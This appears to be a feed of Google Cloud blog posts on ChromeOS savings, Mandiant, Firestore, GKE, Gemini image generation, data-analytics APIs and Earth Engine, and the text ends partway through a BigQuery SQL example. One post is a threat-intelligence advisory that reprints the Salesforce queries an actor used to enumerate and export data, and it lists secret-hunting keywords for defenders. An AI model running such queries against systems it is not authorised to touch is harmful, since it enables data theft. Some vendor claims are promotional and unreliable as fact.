Forrester's analysis, based on interviews with six decision-makers experienced with ChromeOS, aggregated their experiences into a composite organization. This composite organization, a multinational corporation with $5 billion in annual revenue and 40,000 employees, realized a 208% return on investment (ROI) over three years, a payback period of less than six months, and a net present value (NPV) of $6.8 million in savings. The study highlighted four key areas where the composite organization achieved significant benefits:
Increased End-User Productivity
Forrester Consulting found that the composite organization saved 90,000 hours per year in productivity time by leveraging ChromeOS, worth $6.5 million in total savings over a three-year period. Additionally, interviewees reported a 6-minute drop in login time per employee, with one noting that users experienced over 12 hours less downtime per year with ChromeOS.
These gains can be attributed to ChromeOS’s fast bootup times, seamless cloud integration and reduced upfront onboarding times, and AI-integration that helps workers focus on the work they value most.
The users love it. They don’t have to wait for IT to fix things. They don’t have to worry about updates or antivirus. It just works.
CTO
Healthcare
Lowered Device and Licensing Costs
The study also found that ChromeOS led to $1.3 million in savings over three years for the composite organization due to reduced device and license costs. Organizations saved approximately $500 per device, including $300 in hardware costs and $200 in avoided software licenses for security and endpoint management.
With the Google Admin console, ChromeOS devices can be centrally managed and secured so IT admins can reduce additional security agents and management solutions if they choose. Additionally, with 10 years of OS updates, Chromebooks are built to last a long time. What’s more, organizations can install ChromeOS Flex at no cost to extend the life of existing Windows devices, further contributing to savings.
We don’t need to pay for software-licenses. We don’t need to pay for antivirus. We don’t need to pay for a lot of things that we used to pay for.
Enterprise Director
Manufacturing
Strengthened Security Posture
The composite organization achieved a $1.2 million financial benefit from strengthened security. This was driven by a 90% incremental security risk reduction with ChromeOS. One interviewee observed that the number of vulnerabilities per end-user device decreased by 90% after deploying ChromeOS.
ChromeOS offers multi-layered security, automatic updates that happen in the background, and encryption, all contributing to a “secure by default” environment that eliminates the need for extra antivirus software.
Our number of vulnerabilities per end-user device decreased 90% as we continued the ChromeOS rollout. It’s still the only operating system, I believe, that has never had a ransomware attack.
CTO
Healthcare
Reduced IT Support Needs
According to the study, ChromeOS reduced IT support needs, delivering at least $1.1 million in savings over three years. Organizations experienced a 63% reduction in help desk tickets with ChromeOS. Interviewees reported that tickets that did arise were resolved quickly. One interviewee reported that ChromeOS-related tickets take approximately 15 minutes on average to resolve, compared to 2 hours for other operating systems.
We have just one FTE to manage a fleet of 11,000 devices. We barely have to think about it.
Head of IT Security
Financial Services
Discover More: Join Our Webinar!
Interested in learning how these benefits can apply to your organization? Join us for an upcoming webinar: The Total Economic Impact of ChromeOS.
During this session, we will:
Discuss how ChromeOS helps businesses reduce costs related to security, IT, and licensing, while also improving productivity.
Walk through the key findings from Forrester Consulting’s “The Total Economic Impact of ChromeOS” study.
Help you identify users at your organization who are ready to move to ChromeOS by leveraging the ChromeOS Readiness assessment.
Today’s cybersecurity landscape requires partners with expertise and resources to handle any incident. Mandiant, a core part of Google Cloud Security, can empower organizations to navigate critical moments, prepare for future threats, build confidence, and advance their cyber defense programs.
We’re excited to announce that Google has been named a Leader in the IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment (doc #US52036825, August 2025). According to the report, “Mandiant, now a core part of Google Cloud Security, continues to be one of the most recognized and respected names in incident response. With over two decades of experience, Mandiant has built a reputation for responding to some of the world’s most complex and high-impact cyberincidents.” We believe this recognition reflects Mandiant’s extensive experience in some of the world’s most complex and high-impact cyber incidents.
We employ a tightly coordinated “team of teams” model, integrating specialized groups for forensics, threat intelligence, malware analysis, remediation, and crisis communications to assist our customers quickly and effectively.
Our expertise spans technologies and environments, from multicloud and on-premise systems to critical infrastructure. We help secure both emerging and mainstream technologies including AI, Web3, cloud platforms, web applications, and identity systems.
“This structure allows Mandiant to deliver rapid, scalable, and highly tailored responses to incidents ranging from ransomware and nation-state attacks to supply chain compromises and destructive malware,” said the IDC MarketScape report.
SOURCE: “IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment” by Craig Robinson & Scott Tiazkun, August 2025, IDC # US52036825.
The IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each supplier's position within a given market. The Capabilities score measures supplier product, go-to-market, and business execution in the short term. The Strategy score measures alignment of supplier strategies with customer requirements in a 3-5-year timeframe. Supplier market share is represented by the size of the icons.
Differentiated, rapid, and holistic incident response
Speed is crucial in cyber-incident response, and cyber events can quickly become a reputational crisis. Helping customers address those concerns drives our Incident Response Services.
A key part of that is Mandiant’s Cyber Crisis Communication Planning and Response Services, launched in 2022. The IDC MarketScape noted, “The firm’s crisis communications practice, launched in 2022, is a unique offering in the IR space. Recognizing that cyberincidents are as much about trust and perception as they are about technology, Mandiant provides strategic communications support to help clients manage media inquiries, stakeholder messaging, and align with regulatory frameworks.”
Our approach combines robust remediation, recovery, and resilience solutions, including repeatable and cost-effective minimal viable business recovery environments. Designed to restore critical operations after ransomware attacks, our offerings can help reduce recovery timelines from weeks to days — or even hours.
The report notes, “A key differentiator is Mandiant’s integration with Google’s SecOps platform, which enables rapid deployment of investigative capabilities without the need for lengthy software installations. This allows Mandiant to begin triage and scoping within hours, leveraging existing client telemetry and augmenting it with proprietary forensic tools like FACT and Monocle. These tools allow for deep forensic interrogation of endpoints and orchestration of data collection at enterprise scale — capabilities that go beyond what traditional EDR platforms offer.”
Unparalleled access to threat intelligence
Google Threat Intelligence fuses Mandiant’s frontline expertise, the global reach of the VirusTotal community, and the visibility from Google’s services and devices — enhanced by AI. “As part of Google, Mandiant now benefits from unparalleled access to global infrastructure, engineering resources, and threat intelligence,” said the IDC MarketScape report.
By ensuring that this access is deeply embedded in Mandiant Incident Response and Consulting services, we can quickly identify threat actors, tactics, and indicators of compromise (IOCs). A dedicated threat intelligence analyst supports each incident response case, ensuring findings are contextualized and actionable.
Advancing cyber defenses with a strategic, global leader
For more than two decades, Mandiant experts have helped global enterprises respond to and recover from their worst days. We enable organizations to go beyond technology solutions, evaluate specific business threats, and strengthen their cyber defenses.
“Organizations that seek to work with a globally capable IR firm with strong threat intelligence capabilities and that utilizes a holistic approach to incident response that goes beyond the technical portions should consider Google,” said the report.
At Cloud Next ’25, we announced the preview of Firestore with MongoDB compatibility, empowering developers to build cost-effective, scalable, and highly reliable apps on Firestore’s serverless database using a familiar MongoDB-compatible API. Today, we’re announcing that Firestore with MongoDB compatibility is now generally available.
With this launch, the 600,000 active developers within the Firestore community can now use existing MongoDB application code, drivers, and tools, as well as the open-source ecosystem of MongoDB integrations, with Firestore's differentiated serverless service. Firestore provides benefits such as multi-region replication with strong consistency, virtually unlimited scalability, industry-leading high availability with an up to 99.999% SLA, single-digit millisecond read performance, integrated Google Cloud governance, and a cost-effective pay-as-you-go pricing model.
Firestore with MongoDB compatibility is attracting significant customer interest from diverse industries, including financial services, healthcare, retail, and manufacturing. We're grateful for the engagement and the opportunity this afforded to prioritize features that enable key customer use cases. For instance, a prominent online retail company sought to migrate their product catalog from another document database to Firestore with MongoDB compatibility to maximize scalability and availability. To support this migration, the customer used new capabilities like unique indexes to guarantee distinct universal product identifiers. The customer is excited to migrate their production traffic to Firestore with MongoDB compatibility now that it's generally available.
What’s new in Firestore with MongoDB compatibility
Based on direct customer feedback during the preview, we introduced new capabilities to Firestore with MongoDB compatibility, including expanded support for the Firestore with MongoDB compatibility API, enhanced enterprise readiness, and access from both Firebase and Google Cloud. Let’s take a closer look.
1. Expanded support for Firestore with MongoDB compatibility API and query language
Firestore with MongoDB compatibility API and query language now supports over 200 capabilities. Developers can now create richer applications by leveraging new stages and operators that enable joining data across collections, data analysis within buckets, and advanced querying capabilities including arrays, sets, arithmetic, type conversion, and bitwise operations. We also added support for creating indexes directly from the Firestore with MongoDB compatibility API, including the ability to create unique indexes that ensure distinct field values across documents within a collection. Furthermore, the Firestore Studio console editor now features a new JSON viewer and a data export tool. You can find a comprehensive list of Firestore with MongoDB compatibility capabilities in the documentation.
Utilize the MongoDB Query Language (MQL) to run queries like pinpointing optimal wishlist purchase conversions, using new operators and stages such as $setIntersection and $lookup.
2. Built for the enterprise
We have built Firestore with MongoDB compatibility to meet the needs of the enterprise, including new disaster recovery, change data capture, security, and observability features.
For disaster recovery, we've integrated Point-in-Time Recovery (PITR) to complement existing scheduled backups. This helps you recover from human errors, such as accidental data deletion, by letting you roll back to any point in time within the past seven days. We've also introduced database clones, allowing you to create an isolated copy of your database for staging, development, or analytics from any point-in-time recovery snapshot. Furthermore, we've incorporated managed export and import, enabling you to create a portable copy of your Firestore data in Cloud Storage for archival and other regulatory purposes.
Firestore offers multiple, easy-to-use, disaster recovery options including point-in-time recovery and scheduled backups.
For change data capture, trigger support has been added, enabling the configuration of server-side code to respond to document creation, updates, or deletions within your collections. This facilitates the replication of Firestore data changes to other services, such as BigQuery.
Regarding security, Private Google Access has been implemented, providing secure access from in-perimeter Google Cloud services with a private IP address, to a Firestore with MongoDB compatibility database. This connection option is available with no additional cost.
In terms of observability, Firestore with MongoDB compatibility now supports new metrics within a Firestore usage page. This simplifies the identification of MongoDB compatibility API calls that contribute to cost and traffic. This observability feature augments existing capabilities like query explain and query insights to help optimize usage.
3. Broader accessibility through Firebase in addition to Google Cloud
Finally, you can now access Firestore with MongoDB compatibility alongside all of your favorite developer services in Firebase, as well as in Google Cloud. This means you can manage Firestore with MongoDB compatibility from both the Firebase and Google Cloud consoles, and their respective command-line interfaces (CLI).
Create, manage and query your Firestore with MongoDB compatibility database using the Firebase Console.
“While containers make packaging apps easier, a powerful cluster manager and orchestration system is necessary to bring your workloads to production.”
Ten years ago, these words opened the blog post announcing Google Kubernetes Engine (GKE). The need for a managed Kubernetes platform is as important today as it was then, especially as workloads have evolved to meet increasingly complex demands.
One year before GKE’s arrival, we open-sourced large parts of our internal container management system, Borg, as Kubernetes. This marked the beginning of offering our own platforms to customers, and as we continue to use Kubernetes and GKE to power leading services like Vertex AI, we distill our learnings and best practices into GKE. Innovating and evolving GKE to meet the demands of our global platforms and services means that we deliver a best-in-class platform for our customers.
Enhanced flexibility with updated pricing
After ten years of evolution comes another shift: we are updating GKE to make sure every customer can balance efficiency, performance, and cost as effectively as possible. In September 2025, we’re moving to a single paid tier of GKE that comes with more features, and that lets you add features as needed. Now, every customer can take advantage of multi-cluster management features like Fleets, Teams, Config Management, and Policy Controller — all available with GKE Standard at no additional cost.
Flexibility and versatility are always in demand. The new GKE pricing structure provides à la carte access to additional features to meet the specific needs of all of your clusters. We want you to direct your resources toward the most impactful work at all times, and are confident that a single GKE pricing tier will help you manage your workloads — and your budgets — more effectively.
Optimized compute with Autopilot for every cluster
When we launched GKE Autopilot four years ago, we made Kubernetes accessible to every organization — no Kubernetes expertise required. More recently, we rolled out a new container-optimized compute platform, which delivers unique efficiency and performance benefits, ensuring you get the most out of your workload’s allocated resources, so you can serve more traffic with the same capacity, or existing traffic with fewer resources.
Now, we're making Autopilot available for every cluster, including existing GKE Standard clusters, on an ad hoc, per-workload basis. Soon, you'll be able to turn Autopilot on (and off) in any existing Standard cluster to take advantage of fully managed Kubernetes with better performance, at the best price.
Innovations for customer success
The technological landscape shifts quickly. A few years ago, organizations were thinking about stateless microservices; today, the focus is on running complex AI workloads. Throughout, we’re always adapting GKE to meet the needs of innovative companies for new scenarios.
We’re proud of the many incredible products and services built on GKE by customers ranging from startups, to enterprises, to AI companies. AI-powered advertising provider Moloco trains and runs its models with TPUs running on GKE. For nearly a decade, Signify has leveraged GKE as the foundation for its Philips Hue smart lighting platform worldwide. And AI unicorn Anthropic depends on GKE to deliver the scale they need to train and serve their models.
“GKE’s new support for larger clusters provides the scale we need to accelerate our pace of AI innovation.” – James Bradbury, Head of Compute, Anthropic
Foundations for consistent evolution
The AI era has just begun, and we’ve been pushing GKE to meet tomorrow’s workload demands today. With customer insights and Google’s best practices baked in, GKE is the ideal platform for developing and deploying AI at scale.
Thank you to our community, customers, and partners who have been on the GKE journey with us. Celebrate a decade of GKE with us by joining the GKE Turns 10 Hackathon and reading the 10 years of GKE ebook. The future is revealing itself every day, and GKE is ready for wherever AI takes us next.
Today, we announced native image generation and editing in Gemini 2.5 Flash to deliver higher-quality images and more powerful creative control. Gemini 2.5 Flash Image is State of the Art (SOTA) for both generation and image editing. For creative use cases, this means you can create richer, more dynamic visuals and edit images until they’re just right. Here are some ways you can use our state of the art native image generation in Gemini 2.5 Flash.
Multi-image fusion: Combine different images into one seamless new visual. You can use multiple reference images to create a single, unified image for use cases such as marketing, training, or advertising.
Character & style consistency: Maintain the same subject or visual style across multiple generations. Easily place the same character or product in different scenes without losing their identity, saving you from time-consuming fine-tuning.
Conversational editing: Edit images with simple, natural language instructions. From removing a person from a group photo to fixing a small detail like a stain, you can make changes through a simple conversation.
Developers and enterprises can access Gemini 2.5 Flash Image in preview today on Vertex AI.
Here’s how customers are leveraging Vertex AI to build next-gen visuals with Gemini 2.5 Flash Image
“With today’s addition of Google’s Gemini 2.5 Flash Image in Adobe Firefly and Adobe Express, people have even greater flexibility to explore their ideas with industry-leading generative AI models and create stunning content with ease. And with seamless integration across Creative Cloud apps, only Adobe delivers a complete creative workflow that takes ideas from inspiration to impact – empowering everyone with the freedom to experiment, the confidence to perfect every detail, and the control to make their work stand out.” – Hannah Elsakr, Vice President, New GenAI Business Ventures, Adobe
“In our evaluation, Gemini 2.5 Flash Image showed notable strengths in maintaining cross‑edit coherence — preserving both fine‑grained visual details and higher‑level scene semantics across multiple revision cycles. Combined with its low response times, this enables more natural, conversational editing loops and supports deployment in real‑time image‑based applications on Poe and through our API.” – Nick Huber, AI Ecosystem Lead, Poe (by Quora)
"Gemini 2.5 Flash Image is an incredible addition to Google's gen media suite of models. We have tested it across multiple WPP clients and products and have been impressed with the quality of output. We see powerful use cases across multiple sectors, particularly retail, with its ability to combine multiple products into single frames, and CPG, where it maintains a high level of object consistency across frames. We are looking forward to integrating Gemini 2.5 Flash Image into WPP Open, our AI-enabled marketing services platform and developing new production workflows." – Daniel Barak, Global Creative and Innovation Lead, WPP
“For anyone working with visual content, Gemini 2.5 Flash Image is a serious upgrade. Placing products, keeping styles aligned, and ensuring character consistency can all be done in a single step. The model handles complex edits easily, producing results that look polished and professional instantly. Freepik has integrated it into the powerful AI suite powering image generation and editing to help creatives express the power of their ideas.” – Joaquin Cuenca, CEO, Freepik
“Editing requires the highest level of control in any creative process. Gemini 2.5 Flash Image meets that need head-on, delivering precise, iterative changes. It also exhibits extreme flexibility – allowing for significant adjustments to images while retaining character and object consistency. From our early testing at Leonardo.Ai, this model will enable entirely new workflows and creative possibilities, representing a true step-change in capability for the creative industry.” – JJ Fiasson, CEO, Leonardo.ai
Figma's AI image tools now include Google's Gemini 2.5 models, enabling designers to generate and refine images using text prompts, creating realistic content that helps communicate design vision.
Written by: Austin Larsen, Matt Lin, Tyler McLellan, Omar ElAhdan
Introduction
Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025, and continuing through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.
The actor systematically exported large volumes of data from numerous corporate Salesforce instances. GTIG assesses the primary intent of the threat actor is to harvest credentials. After the data was exfiltrated, the actor searched through it for secrets that could potentially be used to compromise victim environments. GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. UNC6395 demonstrated operational security awareness by deleting query jobs; however, logs were not impacted, and organizations should still review relevant logs for evidence of data exposure.
Salesloft indicated that customers that do not integrate with Salesforce are not impacted by this campaign. There is no evidence indicating direct impact to Google Cloud customers; however, any customers that use Salesloft Drift should also review their Salesforce objects for any Google Cloud Platform service account keys.
On Aug. 20, 2025, Salesloft, in collaboration with Salesforce, revoked all active access and refresh tokens for the Drift application. In addition, Salesforce removed the Drift application from the Salesforce AppExchange until further notice, pending further investigation. This issue does not stem from a vulnerability within the core Salesforce platform.
GTIG, Salesforce, and Salesloft have notified impacted organizations.
Threat Detail
The threat actor executed queries to retrieve information associated with Salesforce objects such as Cases, Accounts, Users, and Opportunities. For example, the threat actor ran the following sequence of queries to get a record count for each of the associated Salesforce objects.
SELECT COUNT() FROM Account;
SELECT COUNT() FROM Opportunity;
SELECT COUNT() FROM User;
SELECT COUNT() FROM Case;
Query to Retrieve User Data
SELECT Id, Username, Email, FirstName, LastName, Name, Title, CompanyName,
Department, Division, Phone, MobilePhone, IsActive, LastLoginDate,
CreatedDate, LastModifiedDate, TimeZoneSidKey, LocaleSidKey,
LanguageLocaleKey, EmailEncodingKey
FROM User
WHERE IsActive = true
ORDER BY LastLoginDate DESC NULLS LAST
LIMIT 20
Query to Retrieve Case Data
SELECT Id, IsDeleted, MasterRecordId, CaseNumber <snip>
FROM Case
LIMIT 10000
Recommendations
Given GTIG’s observations of data exfiltration associated with the campaign, organizations using Drift integrated with Salesforce should consider their Salesforce data compromised and are urged to take immediate remediation steps.
Impacted organizations should search for sensitive information and secrets contained within Salesforce objects and take appropriate action, such as revoking API keys, rotating credentials, and performing further investigation to determine if the secrets were abused by the threat actor.
Investigate for Compromise and Scan for Exposed Secrets
Search for the IP addresses and User-Agent strings provided in the IOCs section below. While this list includes IPs from the Tor network that have been observed to date, Mandiant recommends a broader search for any activity originating from Tor exit nodes.
Review Salesforce Event Monitoring logs for unusual activity associated with the Drift connection user.
Review authentication activity from the Drift Connected App.
Review UniqueQuery events that log executed SOQL queries.
Open a Salesforce support case to obtain specific queries used by the threat actor.
Search Salesforce objects for potential secrets, such as:
AKIA for long-term AWS access key identifiers
Snowflake or snowflakecomputing.com for Snowflake credentials
password, secret, key to find potential references to credential material
Strings related to organization-specific login URLs, such as VPN or SSO login pages
Run tools like TruffleHog to find secrets and hardcoded credentials (see the sketch below).
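For example, a minimal TruffleHog sketch (assuming you have exported the relevant Salesforce objects to a local directory; the path is a placeholder):
# Scan a local export of Salesforce data for secrets and hardcoded credentials
trufflehog filesystem ./salesforce_export/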
Rotate Credentials
Immediately revoke and rotate any discovered keys or secrets.
Reset passwords for associated user accounts.
Configure session timeout values in Session Settings to limit the lifespan of a compromised session.
Decision-makers, employees, and customers all need answers where they work: in the applications they use every day. In recent years, the rise of AI-powered BI has transformed our relationship with data, enabling us to ask questions in natural language and get answers fast. But even with support for natural language, the insights you receive are often confined to the data in your BI tool. At Google Cloud, our goal is to change this.
At Google Cloud Next 25, we introduced the Conversational Analytics API, which lets developers embed natural-language query functionality in custom applications, internal tools, or workflows, all backed by trusted data access and scalable, reliable data modeling. The API is already powering first-party Google Cloud conversational experiences, including Looker and BigQuery data canvas, and is available for Google Cloud developers of all stripes to implement wherever their imagination takes them. Today, we're releasing the Conversational Analytics API in public preview. Start building with our documentation.
The Conversational Analytics API lets you build custom data experiences that provide data, chart, and text answers while leveraging Looker’s trusted semantic model for accuracy or providing critical business and data context to agents in BigQuery. You can embed this functionality to create intuitive data experiences, enable complex analysis via natural language, and even orchestrate conversational analytics agents as ‘tools’ for an orchestrator agent using Agent Development Kit.
The Google Health Population app is being developed with the Conversational Analytics API
Getting to know the Conversational Analytics API
The Conversational Analytics API allows you to interact with your BigQuery or Looker data through chat, from anywhere. Embed side-panel chat next to your Looker dashboards, invoke agents in chat applications like Slack, customize your company’s web applications, or build multi-agent systems.
This API empowers your team to obtain answers precisely when and where they are needed, directly within their daily workflows. It achieves this by merging Google’s advanced AI models and agentic capabilities with Looker’s semantic layer and BigQuery’s context engineering services. The result is natural language experiences that can be shared across your organization, making data-to-insight interaction seamless in your company’s most frequently used applications.
Building with Google’s Analytics and AI stack comes with significant benefits in accurate question answering:
Best-in-class AI for data analytics
An agentic architecture that enables the system to perceive its environment and take actions
Access to Looker’s powerful semantic layer for trustworthy answers
High-performance agent tools, including software functions, charts and APIs, supported by dedicated engineering teams
Trust that your data is secure, with row- and column-level access controls applied by default
Guard against expensive queries with built-in query limitations
When pairing the Conversational Analytics API with Looker, Looker's semantic layer reduces data errors in gen AI natural language queries by as much as two-thirds, so that answers stay grounded in trusted definitions.
Looker’s semantic layer ensures your conversational analytics are grounded in data truth.
An agentic architecture powered by Google AI
The Conversational Analytics API uses purpose-built models for querying and analyzing data to provide accurate answers, while its flexible agentic architecture lets you configure which capabilities the agent leverages to best provide users with answers to their questions.
Conversational Analytics leverages an agentic architecture to empower agent creators with the right tools.
As a developer, you can compose AI-powered agents with the following tools:
Text-to-SQL, trusted by customers using Gemini in BigQuery
Context retrieval, informed by personal and organizational usage
Looker’s NL-to-Looker Query Engine, to leverage the analyst-curated semantic layer
Code Interpreter, for advanced analytics like forecasting and root-cause analysis
Charting, to create stunning visualizations and bring data to life
Insights, to explain answers in plain language
These generative AI tools are built upon Google’s latest Gemini models and fine-tuned for specific data analysis tasks to deliver high levels of accuracy. There’s also the Code Interpreter for Conversational Analytics, which provides computations ranging from cohort analysis to period-over-period calculations. Currently in preview, Code Interpreter turns you into a data scientist without having to learn advanced coding or statistical methods. Sign up for early access here.
Context retrieval and generation
A good data analyst isn’t just smart, but also deeply knowledgeable about your business and your data. To provide the same kind of value, a “chat with your data” experience should be just as knowledgeable. That’s why the Conversational Analytics API prioritizes gathering context about your data and queries.
Thanks to retrieval augmented generation (RAG), our Conversational Analytics agents know you and your data well enough to know that when you’re asking for sales in “New York” or “NYC,” you mean “New York City.” The API understands your question’s meaning to match it to the most relevant fields to query, and learns from your organization, recognizing that, for example, “revenue_final_calc” may be queried more frequently than “revenue_intermediate” in your BigQuery project, and adjusts accordingly. Finally, the API learns from your past interactions; it will remember that you queried about “customer lifetime value” in BigQuery Studio on Tuesday when you ask about it again on Friday.
Not all datasets have the context an agent needs to do its work. Column descriptions, business glossaries, and question-query pairs can all improve an agent’s accuracy, but they can be hard to create manually— especially if you have 1,000 tables in your business, each with 500 fields. To speed up the process of teaching your agent, we are including AI-assisted context, using Gemini to suggest metadata that might be useful for your agent to know, while letting you approve or reject changes.
Low maintenance burden
The Conversational Analytics API gives you access to the latest data agent tools from Google Cloud, so you can focus on building your business, not building more agents. You benefit from Google’s continued advancements in generative AI for coding and data analysis.
When you create an agent, we protect your data with Google’s security, best practices, and role-based access controls. Once you share your Looker or BigQuery agent, it can be used across Google Cloud products, such as Agent Development Kit, and in your own applications.
The Conversational Analytics API lets you interact with your data anywhere.
API-powered chats from anywhere
With agents consumable via API, you can surface insights anywhere decision makers need them—whether it’s when speaking with a customer over a support ticket, via a tablet when you’re in the field, or in your messaging apps.
The Conversational Analytics API is designed to bring benefits to all users, whether they be business users, data analysts building agents, or software developers. With Conversational Agents, when a user asks a question, answers are delivered rapidly alongside the agent’s thinking process, to ensure the right approach to gaining insights is used. Individual updates allow your developers to control what a user sees — like answers and charts — and what you want to log for later auditing by analysts — like SQL and Python code.
Geospatial analytics can transform rich data into actionable insights that drive sustainable business strategy and decision making. At Google Cloud Next ‘25, we announced the preview of Earth Engine in BigQuery, an extension of BigQuery’s current geospatial offering, focused on enabling data analysts to seamlessly join their existing structured data with geospatial datasets derived from satellite imagery. Today, we’re excited to announce the general availability of Earth Engine in BigQuery and the preview of a new geospatial visualization capability in BigQuery Studio. With this new set of tools, we’re making geospatial analysis more accessible to data professionals everywhere.
Bringing Earth Engine to data analysts
Earth Engine in BigQuery makes it easy for data analysts to leverage core Earth Engine capabilities from within BigQuery. Organizations using BigQuery for data analysis can now join raster data (and other data derived from satellite imagery) with vector data in their workflows, opening up new possibilities for use cases such as assessing natural disaster risk over time, supply chain optimization, or infrastructure planning based on weather and climate risk data.
This initial release introduced two features:
ST_RegionStats() geography function: A new BigQuery geography function enabling data analysts to derive critical statistics (such as wildfire risk, average elevation, or probability of deforestation) from raster (pixel-based) data within defined geographic boundaries.
Earth Engine datasets in BigQuery Sharing: A growing collection of 20 Earth Engine raster datasets available in BigQuery Sharing (formerly Analytics Hub), offering immediate utility for analyzing crucial information such as land cover, weather, and various climate risk indicators.
What’s new in Earth Engine in BigQuery
With the general availability of Earth Engine in BigQuery, users can now leverage an expanded set of features beyond what was previously available in preview:
Enhanced metadata visibility: A new Image Details tab in BigQuery Studio provides expanded information on raster datasets, such as band and image properties. This makes geospatial dataset exploration within BigQuery easier than ever before.
Improved usage visibility: View slot-time used per job and set quotas for Earth Engine in BigQuery to control your consumption, allowing you to manage your costs and better align with your budgets.
We know visualization is crucial to understanding geospatial data and insights in operational workflows. That's why we've been working on improving visualization for the expanded set of BigQuery geospatial capabilities. Today, we're excited to introduce map visualization in BigQuery Studio, now available in preview.
You might have noticed that the “Chart” tab in the query results pane of BigQuery Studio is now called “Visualization.” Previously, this tab provided a graphical exploration of your query results. With the new Visualization tab, you’ll have all the previous functionality and a new capability to seamlessly visualize geospatial queries (containing a GEOGRAPHY data type) directly on a Google Map, allowing for:
Instant map views: See your query results immediately displayed on a map, transforming raw data into intuitive visual insights.
Interactive exploration: Inspect results, debug your queries, and iterate quickly by interacting directly with the map, accelerating your analysis workflow.
Customized visualization: Visually explore your query results with easy-to-use, customizable styling options, allowing you to highlight key patterns and trends effectively.
Built directly into BigQuery Studio’s query results, map visualization simplifies query building and iteration, making geospatial analysis more intuitive and efficient for everyone.
Visualization tab displays a heat map of census tracts in Colorado with the highest wildfire risk using the Wildfire Risk to Community dataset
Example: Analyzing extreme precipitation events
The integration of Earth Engine in BigQuery with map visualization creates a powerful, unified geospatial analytics platform. Analysts can move from data discovery to complex analysis and visualization without leaving BigQuery, significantly reducing the time to insight. For businesses, this offers powerful new capabilities for assessing climate risk directly within their existing data workflows.
Consider a scenario where an insurance provider needs to assess how hydroclimatic risk is changing across its portfolio in Germany. Using Earth Engine in BigQuery, the provider can analyze decades of climate data to identify trends and changes in extreme precipitation events.
The first step is to access the necessary climate data. Through BigQuery Sharing, you can subscribe to Earth Engine datasets directly. For this analysis, we’ll use the ERA5 Land Daily Aggregates dataset (daily grid or “image” weather maps) to track historical precipitation.
BigQuery Sharing listings for Earth Engine with the ERA5 Daily Land Aggregates highlighted (left) and the dataset description with the “Subscribe” button (right)
By subscribing to the dataset, we can now query it. We use the ST_RegionStats() function to calculate statistics (like the mean or sum) for an image band over a specified geographic area. In our analysis, we calculate the mean daily precipitation for a subset of counties in Germany for each day in our time range and then find the maximum value for each year; this logic appears as Steps 6 and 7 of the combined query shown below.
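As a minimal illustration of the function's shape (not the full query used in this walkthrough), ST_RegionStats() can also be called from the bq CLI against a single image; the image ID below is a hypothetical placeholder and the polygon is a toy area of interest:
# Illustrative only: mean precipitation for one image over a small polygon.
bq query --use_legacy_sql=false '
SELECT
  ST_REGIONSTATS(
    ST_GEOGFROMTEXT("POLYGON((8.5 50.0, 8.8 50.0, 8.8 50.2, 8.5 50.2, 8.5 50.0))"),
    "HYPOTHETICAL_IMAGE_ID",
    "total_precipitation_sum").mean AS mean_precip'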
Next, we analyze the output from the first query to identify changes in extreme event frequency. To do this, we calculate return periods. A return period is a statistical estimate of how likely an event of a certain magnitude is to occur. For example, a “100-year event” is not one that happens precisely every 100 years, but rather an event so intense that it has a 1% (1/100) chance of happening in any given year. This query compares two 30-year periods (1980-2010 vs. 1994-2024) to see how the precipitation values for different return periods have changed:
Note: This query can only be run in US regions. The Overture dataset is US-only. In addition, Earth Engine datasets are rolling out to EU regions over the coming weeks.
-- This UDF implements the Gumbel distribution formula to estimate the event magnitude
-- for a given return period based on the sample mean (xbar) and standard deviation (sigma).
CREATE TEMP FUNCTION
CalculateReturnPeriod(period INT64, xbar FLOAT64, sigma FLOAT64)
  RETURNS FLOAT64 AS ( ROUND(-LOG(-LOG(1 - (1 / period))) * sigma * .7797 + xbar - (.45 * sigma), 4) );

WITH
-- Step 1: Define the analysis areas.
-- This CTE selects a specific subset of five major German counties.
-- ST_SIMPLIFY is used to reduce polygon complexity, improving query performance.
Counties AS (
  FROM `bigquery-public-data.overture_maps.division_area`
  |> WHERE country = 'DE' AND subtype = 'county'
     AND names.primary IN (
       'München',
       'Köln',
       'Frankfurt am Main',
       'Stuttgart',
       'Düsseldorf')
  |> SELECT
       id,
       names.primary AS county,
       ST_SIMPLIFY(geometry, 500) AS geometry
),
-- Step 2: Define the time periods for comparison.
-- These two 30-year, overlapping epochs will be used to assess recent changes.
Epochs AS (
  FROM UNNEST([
    STRUCT('e1' AS epoch, 1980 AS start_year, 2010 AS end_year),
    STRUCT('e2' AS epoch, 1994 AS start_year, 2024 AS end_year)])
),
-- Step 3: Define the return periods to calculate.
ReturnPeriods AS (
  FROM UNNEST([10, 25, 50, 100, 500]) AS years |> SELECT *
),
-- Step 4: Select the relevant image data from the Earth Engine catalog.
-- Replace YOUR_CLOUD_PROJECT with your relevant Cloud Project ID.
Images AS (
  FROM `YOUR_CLOUD_PROJECT.era5_land_daily_aggregated.climate`
  |> WHERE year BETWEEN 1980 AND 2024
  |> SELECT
       id AS img_id,
       start_datetime AS img_date
)
-- Step 5: Begin the main data processing pipeline.
-- This creates a processing task for every combination of a day and a county.
FROM Images
|> CROSS JOIN Counties
-- Step 6: Perform zonal statistics using Earth Engine.
-- ST_REGIONSTATS calculates the mean precipitation for each county for each day.
|> SELECT
     img_id,
     Counties.id AS county_id,
     EXTRACT(YEAR FROM img_date) AS year,
     ST_REGIONSTATS(geometry, img_id, 'total_precipitation_sum') AS areal_precipitation_stats
-- Step 7: Find the annual maximum precipitation.
-- This aggregates the daily results to find the single wettest day for each county within each year.
|> AGGREGATE
     SUM(areal_precipitation_stats.count) AS pixels_examined,
     MAX(areal_precipitation_stats.mean) AS yearly_max_1day_precip,
     ANY_VALUE(areal_precipitation_stats.area) AS pixel_area
   GROUP BY county_id, year
-- Step 8: Calculate statistical parameters for each epoch.
-- Joins the annual maxima to the epoch definitions and then calculates the
-- average and standard deviation required for the Gumbel distribution formula.
|> JOIN Epochs ON year BETWEEN start_year AND end_year
|> AGGREGATE
